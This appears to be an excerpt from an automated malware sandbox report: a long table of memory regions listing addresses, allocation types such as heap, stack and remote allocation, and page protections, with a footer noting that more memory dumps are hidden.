|
heap
|
page read and write
|
||
190000
|
trusted library allocation
|
page read and write
|
||
B60000
|
trusted library allocation
|
page read and write
|
||
5C9B000
|
remote allocation
|
page execute and read and write
|
||
4F70000
|
heap
|
page read and write
|
||
2105E000
|
stack
|
page read and write
|
||
62E0000
|
heap
|
page read and write
|
||
50FE000
|
stack
|
page read and write
|
||
26B0000
|
trusted library allocation
|
page read and write
|
||
22D2000
|
trusted library allocation
|
page read and write
|
||
2150000
|
trusted library allocation
|
page read and write
|
||
2360000
|
trusted library allocation
|
page read and write
|
||
22E0000
|
heap
|
page read and write
|
||
43C0000
|
trusted library allocation
|
page read and write
|
||
41E000
|
heap
|
page read and write
|
||
4641000
|
trusted library allocation
|
page read and write
|
||
391000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
33A000
|
heap
|
page read and write
|
||
20D05000
|
heap
|
page read and write
|
||
44C0000
|
trusted library allocation
|
page read and write
|
||
5D18000
|
stack
|
page read and write
|
||
2291000
|
trusted library allocation
|
page read and write
|
||
20D05000
|
heap
|
page read and write
|
||
315000
|
heap
|
page read and write
|
||
20F8D000
|
stack
|
page read and write
|
||
4650000
|
trusted library allocation
|
page read and write
|
||
347000
|
heap
|
page read and write
|
||
7EF10000
|
trusted library allocation
|
page execute and read and write
|
||
2138F000
|
stack
|
page read and write
|
||
799B000
|
direct allocation
|
page execute and read and write
|
||
463F000
|
stack
|
page read and write
|
||
5D7C000
|
stack
|
page read and write
|
||
3063000
|
trusted library allocation
|
page read and write
|
||
4A0C000
|
stack
|
page read and write
|
||
218BF000
|
stack
|
page read and write
|
||
210000
|
direct allocation
|
page read and write
|
||
B00000
|
trusted library allocation
|
page read and write
|
||
2670000
|
heap
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
20ECF000
|
stack
|
page read and write
|
||
393E000
|
heap
|
page read and write
|
||
2720000
|
trusted library allocation
|
page read and write
|
||
100000
|
direct allocation
|
page read and write
|
||
214FF000
|
stack
|
page read and write
|
||
5BF8000
|
stack
|
page read and write
|
||
3B1000
|
heap
|
page read and write
|
||
34A000
|
heap
|
page read and write
|
||
4380000
|
direct allocation
|
page read and write
|
||
51AB000
|
stack
|
page read and write
|
||
7B0000
|
trusted library allocation
|
page read and write
|
||
20AF0000
|
direct allocation
|
page read and write
|
||
250000
|
direct allocation
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
B70000
|
direct allocation
|
page read and write
|
||
2974000
|
trusted library allocation
|
page read and write
|
||
1A0000
|
direct allocation
|
page read and write
|
||
200000
|
heap
|
page read and write
|
||
513A000
|
heap
|
page read and write
|
||
4B13000
|
heap
|
page read and write
|
||
120000
|
trusted library section
|
page read and write
|
||
299000
|
trusted library allocation
|
page read and write
|
||
180000
|
direct allocation
|
page read and write
|
||
47E000
|
heap
|
page read and write
|
||
21B30000
|
heap
|
page read and write
|
||
3B2000
|
heap
|
page read and write
|
||
194000
|
trusted library allocation
|
page read and write
|
||
214FE000
|
stack
|
page read and write
|
||
25AE000
|
stack
|
page read and write
|
||
3011000
|
trusted library allocation
|
page read and write
|
||
2545000
|
trusted library allocation
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
3939000
|
trusted library allocation
|
page read and write
|
||
43FE000
|
stack
|
page read and write
|
||
150000
|
direct allocation
|
page read and write
|
||
418000
|
trusted library allocation
|
page read and write
|
||
43A000
|
heap
|
page read and write
|
||
23C8000
|
trusted library allocation
|
page read and write
|
||
5280000
|
heap
|
page read and write
|
||
281E000
|
stack
|
page read and write
|
||
3E2000
|
trusted library allocation
|
page read and write
|
||
341D000
|
trusted library allocation
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
4940000
|
heap
|
page execute and read and write
|
||
20E3E000
|
stack
|
page read and write
|
||
5151000
|
heap
|
page read and write
|
||
5EF0000
|
heap
|
page read and write
|
||
49CE000
|
stack
|
page read and write
|
||
20E70000
|
heap
|
page read and write
|
||
21300000
|
heap
|
page read and write
|
||
50EF000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
A7E000
|
stack
|
page read and write
|
||
41D000
|
heap
|
page read and write
|
||
2140F000
|
stack
|
page read and write
|
||
2183B000
|
stack
|
page read and write
|
||
29E4000
|
trusted library allocation
|
page read and write
|
||
3E9B000
|
remote allocation
|
page execute and read and write
|
||
434000
|
unkown
|
page readonly
|
||
492C000
|
stack
|
page read and write
|
||
20BA0000
|
direct allocation
|
page read and write
|
||
4F2E000
|
stack
|
page read and write | page guard
|
||
519E000
|
stack
|
page read and write
|
||
43E6000
|
heap
|
page execute and read and write
|
||
56DE000
|
stack
|
page read and write
|
||
B90000
|
trusted library allocation
|
page read and write
|
||
5DCF000
|
stack
|
page read and write
|
||
341000
|
heap
|
page read and write
|
||
60D8000
|
stack
|
page read and write
|
||
43A0000
|
direct allocation
|
page read and write
|
||
678000
|
heap
|
page read and write
|
||
137000
|
stack
|
page read and write
|
||
2260000
|
heap
|
page read and write
|
||
266F000
|
stack
|
page read and write
|
||
2A9000
|
heap
|
page read and write
|
||
188000
|
heap
|
page read and write
|
||
8CF000
|
stack
|
page read and write
|
||
2ED000
|
heap
|
page read and write
|
||
327000
|
trusted library allocation
|
page read and write
|
||
1BED000
|
heap
|
page read and write
|
||
21520000
|
heap
|
page read and write
|
||
3B90000
|
heap
|
page read and write
|
||
217EF000
|
stack
|
page read and write
|
||
1C0000
|
direct allocation
|
page read and write
|
||
2B6000
|
heap
|
page read and write
|
||
A60000
|
trusted library allocation
|
page read and write
|
||
ABE000
|
stack
|
page read and write
|
||
216D0000
|
heap
|
page read and write
|
||
A60000
|
trusted library allocation
|
page read and write
|
||
25C0000
|
trusted library allocation
|
page execute and read and write
|
||
4D3F000
|
stack
|
page read and write
|
||
A62000
|
trusted library allocation
|
page read and write
|
||
42D0000
|
direct allocation
|
page read and write
|
||
24ED000
|
stack
|
page read and write
|
||
9A5000
|
trusted library allocation
|
page execute and read and write
|
||
1A0000
|
direct allocation
|
page read and write
|
||
4480000
|
trusted library allocation
|
page read and write
|
||
3933000
|
heap
|
page read and write
|
||
A9E000
|
stack
|
page read and write
|
||
4C3B000
|
stack
|
page read and write
|
||
213DE000
|
stack
|
page read and write
|
||
B80000
|
trusted library allocation
|
page read and write
|
||
474000
|
unkown
|
page readonly
|
||
4C3D000
|
stack
|
page read and write
|
||
2670000
|
heap
|
page read and write
|
||
4370000
|
direct allocation
|
page read and write
|
||
3E5000
|
trusted library allocation
|
page execute and read and write
|
||
42E000
|
heap
|
page read and write
|
||
529B000
|
remote allocation
|
page execute and read and write
|
||
3E9B000
|
remote allocation
|
page execute and read and write
|
||
60FC000
|
stack
|
page read and write
|
||
1A4000
|
trusted library allocation
|
page read and write
|
||
4BAE000
|
stack
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
990000
|
heap
|
page execute and read and write
|
||
19D000
|
trusted library allocation
|
page execute and read and write
|
||
50B5000
|
heap
|
page read and write
|
||
3BF000
|
heap
|
page read and write
|
||
229D000
|
heap
|
page read and write
|
||
2EF000
|
stack
|
page read and write
|
||
2A9B000
|
remote allocation
|
page execute and read and write
|
||
292000
|
heap
|
page read and write
|
||
40E000
|
heap
|
page read and write
|
||
483A000
|
stack
|
page read and write
|
||
5D54000
|
heap
|
page read and write
|
||
212CF000
|
stack
|
page read and write
|
||
42F0000
|
trusted library allocation
|
page read and write
|
||
AD0000
|
trusted library allocation
|
page execute and read and write
|
||
9B0000
|
trusted library allocation
|
page read and write
|
||
2A5C000
|
trusted library allocation
|
page read and write
|
||
2F84000
|
heap
|
page read and write
|
||
B90000
|
direct allocation
|
page read and write
|
||
B30000
|
trusted library allocation
|
page read and write
|
||
20FCC000
|
stack
|
page read and write
|
||
696000
|
heap
|
page read and write
|
||
1EC000
|
stack
|
page read and write
|
||
20CE3000
|
heap
|
page read and write
|
||
2510000
|
trusted library allocation
|
page read and write
|
||
256F000
|
stack
|
page read and write
|
||
4440000
|
trusted library allocation
|
page read and write
|
||
423000
|
heap
|
page read and write
|
||
4D1000
|
heap
|
page read and write
|
||
AD0000
|
heap
|
page read and write
|
||
2420000
|
heap
|
page read and write
|
||
92E000
|
stack
|
page read and write
|
||
23D0000
|
heap
|
page read and write
|
||
2147000
|
trusted library allocation
|
page read and write
|
||
4EED000
|
stack
|
page read and write
|
||
88C000
|
stack
|
page read and write
|
||
2D0000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
260F000
|
stack
|
page read and write
|
||
290000
|
direct allocation
|
page read and write
|
||
5240000
|
heap
|
page read and write
|
||
391E000
|
heap
|
page read and write
|
||
2410000
|
trusted library allocation
|
page read and write
|
||
437000
|
unkown
|
page readonly
|
||
416000
|
heap
|
page read and write
|
||
294000
|
heap
|
page read and write
|
||
B90000
|
trusted library allocation
|
page read and write
|
||
536000
|
heap
|
page read and write
|
||
365000
|
heap
|
page read and write
|
||
22E0000
|
heap
|
page read and write
|
||
4EE000
|
stack
|
page read and write
|
||
38F0000
|
heap
|
page read and write
|
||
62F7000
|
heap
|
page read and write
|
||
327000
|
heap
|
page read and write
|
||
230000
|
direct allocation
|
page read and write
|
||
5EEF000
|
stack
|
page read and write
|
||
99F000
|
stack
|
page read and write
|
||
2A3B000
|
trusted library allocation
|
page read and write
|
||
453E000
|
stack
|
page read and write
|
||
20E20000
|
remote allocation
|
page read and write
|
||
4CF0000
|
heap
|
page read and write
|
||
20BB0000
|
direct allocation
|
page read and write
|
||
34E000
|
heap
|
page read and write
|
||
405000
|
heap
|
page read and write
|
||
48EF000
|
stack
|
page read and write
|
||
457000
|
heap
|
page read and write
|
||
390000
|
remote allocation
|
page read and write
|
||
2114E000
|
stack
|
page read and write
|
||
50D2000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
920000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2125F000
|
stack
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
4360000
|
trusted library allocation
|
page execute and read and write
|
||
A10000
|
trusted library allocation
|
page read and write
|
||
4F2F000
|
stack
|
page read and write
|
||
212DE000
|
stack
|
page read and write
|
||
6140000
|
heap
|
page read and write
|
||
416000
|
heap
|
page read and write
|
||
934000
|
trusted library allocation
|
page read and write
|
||
6490000
|
direct allocation
|
page execute and read and write
|
||
4B70000
|
heap
|
page read and write
|
||
20DA0000
|
trusted library allocation
|
page read and write
|
||
2137000
|
heap
|
page read and write
|
||
529B000
|
remote allocation
|
page execute and read and write
|
||
338000
|
heap
|
page read and write
|
||
6450000
|
heap
|
page read and write
|
||
2360000
|
trusted library allocation
|
page read and write
|
||
5110000
|
heap
|
page read and write
|
||
2530000
|
trusted library allocation
|
page read and write
|
||
C0000
|
trusted library section
|
page read and write
|
||
219E000
|
stack
|
page read and write
|
||
260000
|
trusted library allocation
|
page execute and read and write
|
||
474000
|
unkown
|
page readonly
|
||
6420000
|
heap
|
page read and write
|
||
3D1000
|
heap
|
page read and write
|
||
A28000
|
trusted library allocation
|
page read and write
|
||
287000
|
stack
|
page read and write
|
||
710000
|
heap
|
page execute and read and write
|
||
432000
|
unkown
|
page read and write
|
||
1CEE000
|
stack
|
page read and write
|
||
5290000
|
heap
|
page read and write
|
||
3931000
|
trusted library allocation
|
page read and write
|
||
F0000
|
direct allocation
|
page read and write
|
||
71D000
|
heap
|
page read and write
|
||
4C6E000
|
stack
|
page read and write
|
||
8CE000
|
stack
|
page read and write | page guard
|
||
3AB0000
|
trusted library allocation
|
page read and write
|
||
48AC000
|
stack
|
page read and write
|
||
4CAE000
|
stack
|
page read and write
|
||
5F2E000
|
stack
|
page read and write
|
||
5550000
|
heap
|
page read and write
|
||
2147000
|
trusted library allocation
|
page read and write
|
||
1B0000
|
direct allocation
|
page read and write
|
||
8590000
|
direct allocation
|
page execute and read and write
|
||
20CE3000
|
heap
|
page read and write
|
||
424000
|
unkown
|
page read and write
|
||
C0000
|
heap
|
page read and write
|
||
25C0000
|
trusted library allocation
|
page read and write
|
||
50E000
|
heap
|
page read and write
|
||
2D0000
|
heap
|
page read and write
|
||
285000
|
heap
|
page read and write
|
||
4390000
|
direct allocation
|
page read and write
|
||
F0000
|
direct allocation
|
page read and write
|
||
507E000
|
stack
|
page read and write | page guard
|
||
310000
|
heap
|
page read and write
|
||
1D0000
|
direct allocation
|
page read and write
|
||
980000
|
trusted library allocation
|
page read and write
|
||
1D0000
|
direct allocation
|
page read and write
|
||
5520000
|
heap
|
page read and write
|
||
40A000
|
heap
|
page read and write
|
||
2540000
|
trusted library allocation
|
page read and write
|
||
2011000
|
trusted library allocation
|
page read and write
|
||
550E000
|
stack
|
page read and write
|
||
8D9B000
|
direct allocation
|
page execute and read and write
|
||
B7C000
|
stack
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
3959000
|
trusted library allocation
|
page read and write
|
||
4330000
|
direct allocation
|
page read and write
|
||
364000
|
heap
|
page read and write
|
||
4BA3000
|
heap
|
page read and write
|
||
2149F000
|
stack
|
page read and write
|
||
970000
|
trusted library allocation
|
page read and write
|
||
2400000
|
trusted library allocation
|
page read and write
|
||
B13000
|
trusted library allocation
|
page read and write
|
||
4290000
|
trusted library allocation
|
page read and write
|
||
3011000
|
trusted library allocation
|
page read and write
|
||
5E9E000
|
stack
|
page read and write
|
||
519000
|
heap
|
page read and write
|
||
1D0000
|
direct allocation
|
page read and write
|
||
2C46000
|
trusted library allocation
|
page read and write
|
||
1F8000
|
trusted library allocation
|
page read and write
|
||
2165F000
|
stack
|
page read and write
|
||
95C000
|
stack
|
page read and write
|
||
280000
|
direct allocation
|
page read and write
|
||
6190000
|
heap
|
page read and write
|
||
B4E000
|
stack
|
page read and write
|
||
29F000
|
heap
|
page read and write
|
||
979B000
|
direct allocation
|
page execute and read and write
|
||
548D000
|
stack
|
page read and write
|
||
2A58000
|
trusted library allocation
|
page read and write
|
||
51EF000
|
stack
|
page read and write
|
||
5EF000
|
stack
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
2145E000
|
stack
|
page read and write
|
||
5D12000
|
heap
|
page read and write
|
||
21640000
|
heap
|
page read and write
|
||
5028000
|
heap
|
page read and write
|
||
29A9000
|
trusted library allocation
|
page read and write
|
||
394B000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
B40000
|
trusted library allocation
|
page read and write
|
||
2BBA000
|
trusted library allocation
|
page read and write
|
||
4320000
|
direct allocation
|
page read and write
|
||
209B000
|
remote allocation
|
page execute and read and write
|
||
248000
|
trusted library allocation
|
page read and write
|
||
13B000
|
stack
|
page read and write
|
||
4350000
|
direct allocation
|
page read and write
|
||
349B000
|
remote allocation
|
page execute and read and write
|
||
2BFA000
|
trusted library allocation
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
1FA000
|
trusted library allocation
|
page execute and read and write
|
||
2560000
|
trusted library allocation
|
page read and write
|
||
32B9000
|
trusted library allocation
|
page read and write
|
||
20DA0000
|
trusted library allocation
|
page read and write
|
||
D0000
|
trusted library allocation
|
page read and write
|
||
1F0000
|
direct allocation
|
page read and write
|
||
294000
|
heap
|
page read and write
|
||
5CBE000
|
stack
|
page read and write
|
||
4B0000
|
trusted library allocation
|
page read and write
|
||
2EA000
|
trusted library allocation
|
page read and write
|
||
38000
|
heap
|
page read and write
|
||
210DD000
|
stack
|
page read and write
|
||
216BF000
|
stack
|
page read and write
|
||
220000
|
direct allocation
|
page read and write
|
||
38F1000
|
heap
|
page read and write
|
||
2230000
|
direct allocation
|
page read and write
|
||
248000
|
heap
|
page read and write
|
||
4300000
|
direct allocation
|
page read and write
|
||
429000
|
heap
|
page read and write
|
||
1BD0000
|
heap
|
page read and write
|
||
2A88000
|
trusted library allocation
|
page read and write
|
||
390000
|
remote allocation
|
page read and write
|
||
4B8D000
|
heap
|
page read and write
|
||
61DE000
|
stack
|
page read and write | page guard
|
||
928000
|
heap
|
page read and write
|
||
211A000
|
heap
|
page read and write
|
||
21010000
|
heap
|
page read and write
|
||
22E000
|
stack
|
page read and write
|
||
A19B000
|
direct allocation
|
page execute and read and write
|
||
214EE000
|
stack
|
page read and write
|
||
28F0000
|
heap
|
page execute and read and write
|
||
21532000
|
heap
|
page read and write
|
||
507F000
|
stack
|
page read and write
|
||
1C0000
|
heap
|
page execute and read and write
|
||
55EE000
|
stack
|
page read and write
|
||
5306000
|
heap
|
page read and write
|
||
2100000
|
trusted library allocation
|
page read and write
|
||
B80000
|
direct allocation
|
page read and write
|
||
4310000
|
trusted library allocation
|
page read and write
|
||
2011000
|
trusted library allocation
|
page read and write
|
||
513E000
|
stack
|
page read and write
|
||
50C2000
|
heap
|
page read and write
|
||
140000
|
trusted library allocation
|
page read and write
|
||
4490000
|
direct allocation
|
page read and write
|
||
307C000
|
trusted library allocation
|
page read and write
|
||
492E000
|
stack
|
page read and write
|
||
2360000
|
trusted library allocation
|
page read and write
|
||
260000
|
direct allocation
|
page read and write
|
||
5C9B000
|
remote allocation
|
page execute and read and write
|
||
20F8D000
|
stack
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
230000
|
trusted library allocation
|
page execute and read and write
|
||
52AF000
|
heap
|
page read and write
|
||
2F0000
|
heap
|
page read and write
|
||
563E000
|
stack
|
page read and write
|
||
2670000
|
heap
|
page read and write
|
||
45BD000
|
stack
|
page read and write
|
||
21050000
|
heap
|
page read and write
|
||
5020000
|
heap
|
page read and write
|
||
7D8000
|
heap
|
page read and write
|
||
603E000
|
stack
|
page read and write
|
||
A7D000
|
stack
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
409000
|
unkown
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
335000
|
heap
|
page read and write
|
||
25D0000
|
heap
|
page execute and read and write
|
||
15D000
|
trusted library allocation
|
page execute and read and write
|
||
3BE000
|
stack
|
page read and write
|
||
A90000
|
trusted library allocation
|
page execute and read and write
|
||
513E000
|
heap
|
page read and write
|
||
4360000
|
direct allocation
|
page read and write
|
||
305B000
|
trusted library allocation
|
page read and write
|
||
98A000
|
trusted library allocation
|
page read and write
|
||
3779000
|
trusted library allocation
|
page read and write
|
||
1E0000
|
trusted library allocation
|
page read and write
|
||
2670000
|
heap
|
page read and write
|
||
3084000
|
trusted library allocation
|
page read and write
|
||
1D5000
|
trusted library allocation
|
page execute and read and write
|
||
293000
|
heap
|
page read and write
|
||
659B000
|
direct allocation
|
page execute and read and write
|
||
5060000
|
heap
|
page read and write
|
||
276F000
|
stack
|
page read and write
|
||
21A4F000
|
stack
|
page read and write
|
||
49D0000
|
trusted library allocation
|
page execute and read and write
|
||
20D01000
|
heap
|
page read and write
|
||
4B2B000
|
stack
|
page read and write
|
||
1D2000
|
trusted library allocation
|
page read and write
|
||
5B88000
|
stack
|
page read and write
|
||
880000
|
trusted library allocation
|
page read and write
|
||
294000
|
heap
|
page read and write
|
||
A5F000
|
stack
|
page read and write
|
||
270000
|
heap
|
page read and write
|
||
466000
|
heap
|
page read and write
|
||
22E0000
|
heap
|
page read and write
|
||
154000
|
trusted library allocation
|
page read and write
|
||
4380000
|
direct allocation
|
page read and write
|
||
26BC000
|
trusted library allocation
|
page read and write
|
||
434000
|
unkown
|
page readonly
|
||
54CC000
|
stack
|
page read and write
|
||
2E4000
|
heap
|
page read and write
|
||
560000
|
trusted library allocation
|
page read and write
|
||
3291000
|
trusted library allocation
|
page read and write
|
||
1D74000
|
heap
|
page read and write
|
||
AF2000
|
heap
|
page read and write
|
||
2BE000
|
stack
|
page read and write
|
||
160000
|
trusted library allocation
|
page read and write
|
||
53DE000
|
stack
|
page read and write | page guard
|
||
52BD000
|
heap
|
page read and write
|
||
AD4000
|
heap
|
page read and write
|
||
4560000
|
direct allocation
|
page read and write
|
||
2B0000
|
trusted library section
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
2115F000
|
stack
|
page read and write
|
||
501E000
|
stack
|
page read and write
|
||
22FD000
|
heap
|
page read and write
|
||
B19000
|
trusted library allocation
|
page read and write
|
||
4B6E000
|
stack
|
page read and write
|
||
403000
|
heap
|
page read and write
|
||
407000
|
heap
|
page read and write
|
||
211DF000
|
stack
|
page read and write
|
||
1F90000
|
remote allocation
|
page execute and read and write
|
||
3C7000
|
heap
|
page read and write
|
||
20E1F000
|
stack
|
page read and write
|
||
2360000
|
trusted library allocation
|
page read and write
|
||
46A0000
|
direct allocation
|
page execute and read and write
|
||
21410000
|
heap
|
page read and write
|
||
4480000
|
direct allocation
|
page read and write
|
||
2110E000
|
stack
|
page read and write
|
||
336000
|
heap
|
page read and write
|
||
4F7D000
|
stack
|
page read and write
|
||
4310000
|
direct allocation
|
page read and write
|
||
100000
|
direct allocation
|
page read and write
|
||
2460000
|
trusted library allocation
|
page read and write
|
||
219DD000
|
stack
|
page read and write
|
||
55F0000
|
heap
|
page read and write
|
||
674000
|
heap
|
page read and write
|
||
29B000
|
heap
|
page read and write
|
||
2A2000
|
heap
|
page read and write
|
||
475000
|
heap
|
page read and write
|
||
342000
|
heap
|
page read and write
|
||
2F88000
|
heap
|
page read and write
|
||
20CDD000
|
heap
|
page read and write
|
||
A5E000
|
stack
|
page read and write
|
||
42E000
|
heap
|
page read and write
|
||
1B0000
|
direct allocation
|
page read and write
|
||
20CBD000
|
heap
|
page read and write
|
||
98E000
|
stack
|
page read and write
|
||
A50000
|
trusted library allocation
|
page read and write
|
||
4F6000
|
heap
|
page read and write
|
||
29FB000
|
trusted library allocation
|
page read and write
|
||
42F0000
|
direct allocation
|
page read and write
|
||
B80000
|
trusted library allocation
|
page read and write
|
||
210CC000
|
stack
|
page read and write
|
||
2F0000
|
heap
|
page execute and read and write
|
||
2121D000
|
stack
|
page read and write
|
||
210FE000
|
stack
|
page read and write
|
||
1C0000
|
trusted library allocation
|
page read and write
|
||
200000
|
direct allocation
|
page read and write
|
||
A30000
|
trusted library allocation
|
page read and write
|
||
5320000
|
heap
|
page read and write
|
||
2F0000
|
trusted library allocation
|
page read and write
|
||
9DF000
|
stack
|
page read and write
|
||
3F20000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page read and write
|
||
2931000
|
trusted library allocation
|
page read and write
|
||
F0000
|
trusted library section
|
page read and write
|
||
3AF000
|
heap
|
page read and write
|
||
3A5000
|
heap
|
page read and write
|
||
349B000
|
remote allocation
|
page execute and read and write
|
||
490000
|
direct allocation
|
page read and write
|
||
330000
|
trusted library allocation
|
page read and write
|
||
46D000
|
stack
|
page read and write
|
||
750000
|
heap
|
page execute and read and write
|
||
3B9000
|
heap
|
page read and write
|
||
6A0000
|
remote allocation
|
page read and write
|
||
3771000
|
trusted library allocation
|
page read and write
|
||
190000
|
direct allocation
|
page read and write
|
||
2DD000
|
trusted library allocation
|
page execute and read and write
|
||
5EB0000
|
heap
|
page read and write
|
||
24DF000
|
stack
|
page read and write
|
||
3039000
|
trusted library allocation
|
page read and write
|
||
43E0000
|
heap
|
page execute and read and write
|
||
22FD000
|
heap
|
page read and write
|
||
227D000
|
heap
|
page read and write
|
||
4A7C000
|
stack
|
page read and write
|
||
300000
|
heap
|
page read and write
|
||
1EC000
|
stack
|
page read and write
|
||
5CED000
|
stack
|
page read and write
|
||
2139E000
|
stack
|
page read and write
|
||
4A5000
|
heap
|
page read and write
|
||
227000
|
stack
|
page read and write
|
||
96E000
|
stack
|
page read and write
|
||
7B3000
|
trusted library allocation
|
page read and write
|
||
23E0000
|
trusted library allocation
|
page read and write
|
||
20DA0000
|
trusted library allocation
|
page read and write
|
||
2BFC000
|
trusted library allocation
|
page read and write
|
||
2163E000
|
stack
|
page read and write
|
||
528E000
|
stack
|
page read and write
|
||
2130F000
|
stack
|
page read and write
|
||
71D000
|
heap
|
page read and write
|
||
213CF000
|
stack
|
page read and write
|
||
270000
|
heap
|
page read and write
|
||
2A5000
|
heap
|
page read and write
|
||
3904000
|
heap
|
page read and write
|
||
4460000
|
trusted library allocation
|
page execute and read and write
|
||
2010000
|
trusted library allocation
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
2210000
|
direct allocation
|
page read and write
|
||
4A4E000
|
stack
|
page read and write
|
||
489B000
|
remote allocation
|
page execute and read and write
|
||
285E000
|
stack
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
3D40000
|
heap
|
page read and write
|
||
44BF000
|
stack
|
page read and write
|
||
4E3D000
|
stack
|
page read and write
|
||
930000
|
trusted library allocation
|
page read and write
|
||
5ED2000
|
heap
|
page read and write
|
||
602000
|
heap
|
page read and write
|
||
193000
|
trusted library allocation
|
page execute and read and write
|
||
7D0000
|
heap
|
page read and write
|
||
5146000
|
heap
|
page read and write
|
||
4A9E000
|
stack
|
page read and write
|
||
4470000
|
direct allocation
|
page read and write
|
||
44F0000
|
trusted library allocation
|
page read and write
|
||
4890000
|
trusted library allocation
|
page read and write
|
||
7B9000
|
trusted library allocation
|
page read and write
|
||
250000
|
heap
|
page read and write
|
||
227E000
|
heap
|
page read and write
|
||
450E000
|
stack
|
page read and write
|
||
9A2000
|
trusted library allocation
|
page read and write
|
||
509E000
|
stack
|
page read and write | page guard
|
||
5CF4000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3039000
|
trusted library allocation
|
page read and write
|
||
34B000
|
heap
|
page read and write
|
||
2C0000
|
trusted library allocation
|
page read and write
|
||
2660000
|
heap
|
page read and write
|
||
610E000
|
stack
|
page read and write
|
||
260000
|
trusted library section
|
page read and write
|
||
5C9B000
|
remote allocation
|
page execute and read and write
|
||
21B0000
|
trusted library allocation
|
page read and write
|
||
2360000
|
trusted library allocation
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
43B0000
|
direct allocation
|
page read and write
|
||
2E0000
|
trusted library allocation
|
page read and write
|
||
290000
|
trusted library allocation
|
page read and write
|
||
506F000
|
heap
|
page read and write
|
||
3415000
|
trusted library allocation
|
page read and write
|
||
270000
|
heap
|
page read and write
|
||
5E20000
|
heap
|
page read and write
|
||
20ECE000
|
stack
|
page read and write
|
||
4482000
|
trusted library allocation
|
page read and write
|
||
240000
|
direct allocation
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
510E000
|
stack
|
page read and write
|
||
49EE000
|
stack
|
page read and write
|
||
B6E000
|
stack
|
page read and write
|
||
160000
|
direct allocation
|
page read and write
|
||
27B5000
|
trusted library allocation
|
page read and write
|
||
22ED000
|
heap
|
page read and write
|
||
421000
|
heap
|
page read and write
|
||
4C1E000
|
stack
|
page read and write
|
||
4A9E000
|
stack
|
page read and write
|
||
515A000
|
heap
|
page read and write
|
||
1C2000
|
trusted library allocation
|
page read and write
|
||
33F000
|
heap
|
page read and write
|
||
21C0000
|
trusted library allocation
|
page read and write
|
||
2360000
|
trusted library allocation
|
page read and write
|
||
2710000
|
trusted library allocation
|
page read and write
|
||
369000
|
heap
|
page read and write
|
||
5B7000
|
heap
|
page read and write
|
||
489B000
|
remote allocation
|
page execute and read and write
|
||
205000
|
trusted library allocation
|
page execute and read and write
|
||
2101D000
|
stack
|
page read and write
|
||
3933000
|
heap
|
page read and write
|
||
2B3000
|
heap
|
page read and write
|
||
2670000
|
heap
|
page read and write
|
||
394B000
|
heap
|
page read and write
|
||
5EEE000
|
stack
|
page read and write | page guard
|
||
2520000
|
trusted library allocation
|
page read and write
|
||
4A0000
|
direct allocation
|
page read and write
|
||
20FFE000
|
stack
|
page read and write
|
||
1D92000
|
heap
|
page read and write
|
||
337000
|
heap
|
page read and write
|
||
170000
|
direct allocation
|
page read and write
|
||
470000
|
direct allocation
|
page read and write
|
||
60F8000
|
stack
|
page read and write
|
||
3063000
|
trusted library allocation
|
page read and write
|
||
98F000
|
stack
|
page read and write
|
||
9D0000
|
trusted library allocation
|
page execute and read and write
|
||
4C0000
|
heap
|
page execute and read and write
|
||
20FBE000
|
stack
|
page read and write
|
||
429000
|
unkown
|
page read and write
|
||
120000
|
heap
|
page read and write
|
||
49C000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
46B0000
|
trusted library allocation
|
page execute and read and write
|
||
2426000
|
heap
|
page read and write
|
||
2D3000
|
trusted library allocation
|
page execute and read and write
|
||
504E000
|
stack
|
page read and write
|
||
B60000
|
direct allocation
|
page read and write
|
||
40E000
|
heap
|
page read and write
|
||
2BF000
|
heap
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
983000
|
trusted library allocation
|
page read and write
|
||
5040000
|
heap
|
page read and write
|
||
68D000
|
stack
|
page read and write
|
||
272A000
|
stack
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
B50000
|
heap
|
page execute and read and write
|
||
1C0000
|
direct allocation
|
page read and write
|
||
4370000
|
direct allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
2A3E000
|
trusted library allocation
|
page read and write
|
||
8CF000
|
stack
|
page read and write
|
||
980000
|
trusted library allocation
|
page read and write
|
||
26BE000
|
stack
|
page read and write
|
||
382000
|
heap
|
page read and write
|
||
4A2B000
|
stack
|
page read and write
|
||
4370000
|
direct allocation
|
page read and write
|
||
2BE000
|
stack
|
page read and write
|
||
716000
|
heap
|
page read and write
|
||
31F000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
999000
|
trusted library allocation
|
page read and write
|
||
506A000
|
heap
|
page read and write
|
||
3E9B000
|
remote allocation
|
page execute and read and write
|
||
AF0000
|
trusted library allocation
|
page read and write
|
||
460000
|
trusted library allocation
|
page read and write
|
||
457000
|
heap
|
page read and write
|
There are 1067 hidden memdumps, click here to show them.